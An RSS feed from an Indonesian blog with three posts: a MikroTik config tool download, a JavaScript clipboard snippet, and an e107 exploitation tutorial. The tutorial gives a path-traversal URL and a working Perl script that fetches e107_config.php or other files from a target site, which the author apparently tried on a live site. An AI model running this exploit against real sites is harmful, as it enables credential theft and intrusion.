﻿﻿﻿<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NitrouZ Personal Pages &#187; script</title>
	<atom:link href="http://xtremenitro.org/tag/script/feed" rel="self" type="application/rss+xml" />
	<link>http://xtremenitro.org</link>
	<description>Do What The Fvck You Want To</description>
	<lastBuildDate>Tue, 07 Feb 2012 08:17:14 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Mikrotik Script Maker [KotjokDjaja Team]</title>
		<link>http://xtremenitro.org/2008/12/29/mikrotik-script-maker-kotjokdjaja-team.html</link>
		<comments>http://xtremenitro.org/2008/12/29/mikrotik-script-maker-kotjokdjaja-team.html#comments</comments>
		<pubDate>Mon, 29 Dec 2008 03:20:34 +0000</pubDate>
		<dc:creator>NitrouZ</dc:creator>
				<category><![CDATA[Mikrotik]]></category>
		<category><![CDATA[Networking & Server]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[easy to setup mikrotik]]></category>
		<category><![CDATA[konfigurasi mudah dengan mikrotik]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[mikrotik script maker]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=764</guid>
		<description><![CDATA[Masih terlalu baru untuk main mikrotik ? Seperti saya contohnya :D Kali ini, om LucuBRB abis buatin tools kecil bagi yang ingin belajar mikrotik supaya lebih mudah untuk mengkonfigurasi, karena selama ini banyak temen-temen yang masih salah/belum paham/bingung dalam mengkonfigurasinya. Screenshot : Cara Penggunaan : Jalankan file *.exe, lalu ikuti instruksi yang ada di setiap [...]]]></description>
			<content:encoded><![CDATA[<p>Masih terlalu baru untuk main mikrotik ? Seperti saya contohnya :D Kali ini, om LucuBRB abis buatin tools kecil bagi yang ingin belajar mikrotik supaya lebih mudah untuk mengkonfigurasi, karena selama ini banyak temen-temen yang masih salah/belum paham/bingung dalam mengkonfigurasinya.</p>
<p>Screenshot :</p>
<div id="attachment_765" class="wp-caption aligncenter" style="width: 355px"><img class="size-full wp-image-765" title="Welcome Screen" src="http://xtremenitro.org/wp-content/uploads/2008/12/mikrotik_script_maker_welcome_screen.jpg" alt="Welcome Screen" width="345" height="199" /><p class="wp-caption-text">Welcome Screen</p></div>
<div id="attachment_766" class="wp-caption aligncenter" style="width: 297px"><img class="size-full wp-image-766" title="Mikrotik Script Maker Queue" src="http://xtremenitro.org/wp-content/uploads/2008/12/mikrotik_script_maker_queue.jpg" alt="Mikrotik Script Maker Queue" width="287" height="258" /><p class="wp-caption-text">Mikrotik Script Maker Queue</p></div>
<div id="attachment_767" class="wp-caption aligncenter" style="width: 298px"><img class="size-full wp-image-767" title="Mikrotik Script Maker Queue Tree" src="http://xtremenitro.org/wp-content/uploads/2008/12/mikrotik_script_maker_queue_tree.jpg" alt="Mikrotik Script Maker Queue Tree" width="288" height="335" /><p class="wp-caption-text">Mikrotik Script Maker Queue Tree</p></div>
<div id="attachment_768" class="wp-caption aligncenter" style="width: 401px"><img class="size-full wp-image-768" title="Mikrotik Script Maker RSC" src="http://xtremenitro.org/wp-content/uploads/2008/12/mikrotik_script_maker_rsc.jpg" alt="Mikrotik Script Maker RSC" width="391" height="492" /><p class="wp-caption-text">Mikrotik Script Maker RSC</p></div>
<p>Cara Penggunaan :</p>
<p>Jalankan file *.exe, lalu ikuti instruksi yang ada di setiap menu. Selesai ! :D</p>
<p>Download Files : <a href="http://xtremenitro.org/wp-content/uploads/2008/12/mikrotikscriptmaker.exe">Mikrotik Script Maker</a></p>
<p>MD5 : 8272366ae63f2bdec7e9098fada72656</p>
<p>Thanks to : <a href="http://lucubrb.wordpress.com" target="_blank">LucuBRB</a></p>
]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2008/12/29/mikrotik-script-maker-kotjokdjaja-team.html/feed</wfw:commentRss>
		<slash:comments>42</slash:comments>
		</item>
		<item>
		<title>Copy to clipboard using JavaScript</title>
		<link>http://xtremenitro.org/2008/12/12/copy-to-clipboard-using-javascript.html</link>
		<comments>http://xtremenitro.org/2008/12/12/copy-to-clipboard-using-javascript.html#comments</comments>
		<pubDate>Fri, 12 Dec 2008 01:05:48 +0000</pubDate>
		<dc:creator>NitrouZ</dc:creator>
				<category><![CDATA[Programming & Scripting]]></category>
		<category><![CDATA[auto copy to clipboard]]></category>
		<category><![CDATA[javasript]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=638</guid>
		<description><![CDATA[Setelah berpusing ria, dan akhirnya ngga&#8217; menghubungi adeknya :p, akhirnya saya googling dan nemu beberapa contoh penggunaan JavaScript Auto Copy to Clipboard, akhirnya saya menemukan satu fungsi yang menurut saya keren :D Pada instalasi dasar, beberapa browser selain Internet Explorer tidak mendukung Auto Copy menggunakan JavaScript. Jadi script auto copy ini hanya berfungsi untuk Internet [...]]]></description>
			<content:encoded><![CDATA[<p>Setelah <a href="http://xtremenitro.org/2008/12/11/antara-sahabat-dan-sayang.html" target="_blank">berpusing ria</a>, dan akhirnya <em>ngga&#8217;</em> menghubungi <a href="http://hikarianna.blogspot.com" target="_blank">adeknya</a> :p, akhirnya saya googling dan nemu beberapa contoh penggunaan JavaScript Auto Copy to Clipboard, akhirnya saya menemukan satu fungsi yang menurut saya keren :D Pada instalasi dasar, beberapa browser selain Internet Explorer tidak mendukung Auto Copy menggunakan JavaScript. Jadi script auto copy ini hanya berfungsi untuk Internet Explorer saja :D</p>
<p>Nah, lalu apa yang menarik di sini ? Fungsi yang saya dapat dari hasil kemarin adalah, saat cursor melakukan click, maka semua yang ada pada textarea akan terpilih (Tested on Firefox, IE, dan Opera). Lalu untuk apa fungsinya ? Ya fungsinya adalah untuk <em>select all</em> aja :p Tergantung variasi kalian ingin digunakan untuk apa.</p>
<p>Berikut fungsi javascript nya :</p>
<pre>&lt;script type="text/javascript"&gt;
function doclip(d){
		var content = eval("document.kopi." + d) // menuju ke form
		content.focus()
		content.select()
		range = content.createTextRange()
		range.execCommand("Copy")
		window.status="Contents copied to clipboard" // Menampilkan status untuk IE
		setTimeout("window.status=''",1800)
	}
&lt;/script&gt;</pre>
<p>Setelah membuat fungsi di atas menggunakan javascript, sekarang buatlah rangkaian form seperti berikut :</p>
<pre>&lt;form name="kopi"&gt;
&lt;textarea name="txta_pilihan" cols="25" rows="5" onclick="doclip('txta_pilihan')"&gt;
&lt;!-- your text here --&gt;
&lt;/textarea&gt;</pre>
<p>Kenapa &lt;form&gt; tidak diberi <em>closing tag</em> ? Karena kesimpulan saya itu hanya untuk identifikasi saja bahwa fungsi tersebut baru bisa di jalankan apabila form pemanggilnya di keluarkan. CMIIW. Kalau dikasih closing tag juga ngga&#8217; masalah kok. Jangan lupa pada form tersebut diberi atribut <em>name</em> dengan <em>value</em> kopi</p>
<p>Nah, pada bagian berikutnya saya menggunakan textarea (bisa juga yang lain seperti input). Pada textarea tersebut saya menambahkan attribut <em>name</em> dengan value <em>txta_pilihan</em>. Lalu pada bagian OnClick (karena fungsi ini di konfigurasi jalan setelah di klik), saya menambahkan fungsi yang telah terbuat di atas yaitu <em>onclick=&#8221;doclip(&#8216;txta_pilihan&#8217;)&#8221;.</em> Di mana <em>doclip</em> adalah fungsi yang telah di buat dan <em>txta_pilihan</em> adalah nama textarea yang ingin di pilih.</p>
<p>Bagaimana hasilnya ? Silakan di coba :) Laporkan jika terjadi error :D</p>
]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2008/12/12/copy-to-clipboard-using-javascript.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>[Tutorial] Contoh Exploitasi Vulnerabilities Pada e107</title>
		<link>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html</link>
		<comments>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html#comments</comments>
		<pubDate>Sat, 06 Dec 2008 23:19:55 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Programming & Scripting]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[contoh]]></category>
		<category><![CDATA[e107]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[vulnerable]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=555</guid>
		<description><![CDATA[Disclaimer Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk. Ilustrasi Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer</b><br />
Tutorial ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan tutorial ini. Use at your own risk.<br/><br/><br />
<b>Ilustrasi</b><br />
Awalnya saya ingin membuat tutorial tentang javascript, namun entah mengapa tiba-tiba muncul keinginan untuk mencari hal yang menarik. Akhirnya saya coba browsing ke sana kemari hingga tiba di salah satu situs yang cukup menarik karena menggunakan <a href="http://e107.org/">e107</a>. Dan setelah saya perhatikan sebentar, ternyata situs tersebut terdapat plugin <font color="#0000ff">my_gallery</font>. Karena penasaran, saya coba mencari vulnerabilities e107 di <a href="http://www.milw0rm.com/">milw0rm</a>, dan kebetulan ketemu vulnerabilities untuk plugin tersebut, seperti pada gambar berikut ini:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_00.png"><br/><br/><br />
Ternyata plugin tersebut memungkinkan local file download :) hmmm&#8230; menarik. Ok, akhirnya saya mendownload e107 untuk mencari tahu apa saja file-file penting pada e107. Setelah diekstrak, saya lihat ada file <font color="#0000ff">e107_config.php</font> dan ternyata file tersebut kosong. Dari situ saya mengambil kesimpulan sementara bahwa file tersebut akan diisi oleh e107 pada saat instalasi:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_01.png"><br/><br/><br />
Selain hal tersebut, saya juga memperhatikan bahwa di sana ada file <font color="#0000ff">class2.php</font> dan ternyata setelah diperhatikan secara seksama dalam tempo yang sesingkat-singkatnya :D ternyata benar, file <font color="#0000ff">e107_config.php</font> akan diisi oleh e107 ketika instalasi berlangsung:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_02.png"><br/><br/><br />
Sekarang, saya kembali ke browser untuk mencoba apakah jurusnya ampuh B-) dan ternyata benar. File konfigurasi e107 bisa diakses pada path <font color="#ff0000">../../e107_config.php</font> jadi, bentuk url selengkapnya seperti ini:</p>
<blockquote><p>http://<font color="#ff0000">www.target.com</font>/e107_plugins/my_gallery/dload.php?file=../../e107_config.php</p></blockquote>
<p>Contohnya seperti ini:<br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_03.png"><br/><br/><br />
Nah, daripada menggunakan browser, bagaimana jika kita membuat script sederhana untuk memudahkan proses ini :D . Jadi script ini akan menerima 2 parameter dimana parameter terakhir sifatnya optional yaitu nama file pada target yang ingin dilihat. Jika parameter tersebut kosong, maka akan mencoba membuka file configurasi e107. Nah, berikut ini snippetnya dalam bahasa perl (maaf kodenya kacau maklum saya bukan programmer):</p>
<pre>
#!/usr/bin/perl

use LWP::UserAgent;

die("[i] aturan pakai: e107conf.pl &lt;website&gt; [file]\n") unless @ARGV &gt; 0;
$ua = LWP::UserAgent-&gt;new;
$fx = ($ARGV[1] eq '') ? "../../e107_config.php" : $ARGV[1];
$ex = $ua->request(HTTP::Request-&gt;new(GET => "http://".$ARGV[0]."/e107_plugins/my_gallery/dload.php?file=".$fx));

if ($ex-&gt;is_success) { print "[+] web: ".$ARGV[0]."\n".$ex-&gt;content."\n"; }
</pre>
<p>Nah, berikut ini 2 screenshot ketika script ini bekerja dimana pada screenshot pertama kita hanya memberikan alamat website yang ingin dieksploitasi, sedangkan pada screenshot ke-2 kita memberikan parameter ke-2 yaitu nama file yang ingin dilihat :) <br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_04.png"><br/><br/><br />
<img src="http://xtremenitro.org/wp-content/uploads/2008/12/ss_e107_05.png"><br/><br/><br/><br/><br />
<b>Penutup</b><br />
Sekian dulu tutorial sederhana dari saya, semoga bisa bermanfaat untuk Anda. Sampai jumpa di tutorial berikutnya :)<br/><br/><br />
<b>Ucapan Terima Kasih</b><br />
Tanpa Urutan: Tuhan Yang Maha Esa, NitrouZ, pinczakko, hddstudio, dylavig, LiFe, LucuBRB, 4NV|e, movzx, k0il, semua rekan-rekan yang tidak sempat saya sebutkan satu-satu di sini (you know who you are) :) dan Anda yang telah membaca tutorial ini&#8230; (terima kasih telah membaca tutorial ini)&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2008/12/07/tutorial-contoh-exploitasi-vulnerabilities-pada-e107.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

